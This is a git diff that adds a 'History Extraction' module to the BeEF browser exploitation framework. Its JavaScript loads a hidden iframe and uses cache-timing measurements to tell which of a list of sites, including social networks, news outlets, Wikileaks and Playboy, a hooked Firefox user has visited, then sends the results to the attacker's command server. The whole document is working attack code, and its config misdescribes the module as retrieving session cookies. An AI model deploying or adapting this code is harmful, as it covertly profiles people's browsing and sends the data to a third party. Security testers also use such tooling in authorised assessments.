diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js new file mode 100644 index 000000000..d3ffcc482 --- /dev/null +++ b/modules/browser/get_history/command.js @@ -0,0 +1,233 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +var hidden_iframe = beef.dom.createInvisibleIframe(); +hidden_iframe.setAttribute('id','f'); +hidden_iframe.setAttribute('name','f'); +hidden_iframe.setAttribute('src','about:blank'); +hidden_iframe.setAttribute('style','opacity: 0.1'); + +var results = ""; +var tries = 0; + +/******************************* + * SUB-MS TIMER IMPLEMENTATION * + *******************************/ +var cycles = 0; +var exec_next = null; + +function timer_interrupt() { + cycles++; + if (exec_next) { + var cmd = exec_next; + exec_next = null; + cmd(); + } +} + +window.addEventListener('message', timer_interrupt, false); + +function sched_call(fn) { + exec_next = fn; + window.postMessage('123', '*'); +} + +/**************** + * SCANNED URLS * + ****************/ +var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } +]; + + +/************************* + * CONFIGURABLE SETTINGS * + *************************/ +var TIME_LIMIT = 5; +var MAX_ATTEMPTS = 2; + +/********************** + * MAIN STATE MACHINE * + **********************/ +var log_area; +var target_off = 0; +var attempt = 0; +var confirmed_visited = false; +var current_url, current_name; +var wait_cycles; +var frame_ready = false; +var start, stop, urls; + +/* The frame was just pointed to data:... at this point. Initialize a new test, giving the + frame some time to fully load. */ +function perform_check() { + wait_cycles = 0; + setTimeout(wait_for_read, 1); +} + + +/* Confirm that data:... is loaded correctly. */ +function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } +} + + +/* Navigate the frame to the target URL. */ +function navigate_to_target() { + cycles = 0; + sched_call(wait_for_noread); + urls++; + document.getElementById("f").src = current_url; +} + +/* The browser is now trying to load the destination URL. Let's see if + we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache + hit. If not, seems like cache miss. In both cases, the navigation + will be aborted by maybe_test_next(). */ + +function wait_for_noread() { + try { + if (document.getElementById('f').contentWindow.location.href == undefined) + { + confirmed_visited = true; + throw 1; + } + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } catch (e) { + confirmed_visited = true; + maybe_test_next(); + } +} + + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,5000); + } +} + +function reload(){ + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + +function maybe_test_next() { + + frame_ready = false; + document.getElementById('f').src = 'data:text/html,'; + if (target_off < targets.length) { + if (targets[target_off].category) { + //log_text(targets[target_off].category + ':', 'p', 'category'); + target_off++; + } + if (confirmed_visited) { + log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited'); + } + if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) { + if (!confirmed_visited) + //continue; + log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited'); + confirmed_visited = false; + target_off++; + attempt = 0; + maybe_test_next(); + } else { + current_url = targets[target_off].urls[attempt % targets[target_off].urls.length]; + current_name = targets[target_off].name; + attempt++; + perform_check(); + } + } //else { + //en = (new Date()).getTime(); + //} +} + +/* The handler for "run the test" button on the main page. Dispenses + advice, resets state if necessary. */ +function start_stuff() { + if (navigator.userAgent.indexOf('Firefox/') == -1) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.'); + //alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' + + // 'Versions for other browsers can be found here:\n' + + // 'http://lcamtuf.coredump.cx/cachetime/'); + } + else{ + target_off = 0; + attempt = 0; + confirmed_visited = false; + urls = 0; + results = ""; + maybe_test_next(); + } +} + +beef.execute(function() { + urls = undefined; + exec_next = null; + start_stuff(); +}); + + diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml new file mode 100644 index 000000000..3cb2ea648 --- /dev/null +++ b/modules/browser/get_history/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_history: + enable: true + category: "Browser" + name: "History Extraction" + description: "This module will retrieve the session cookie from the current page." + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["FF"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb new file mode 100644 index 000000000..be20141df --- /dev/null +++ b/modules/browser/get_history/module.rb @@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_history < BeEF::Core::Command + + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end + +end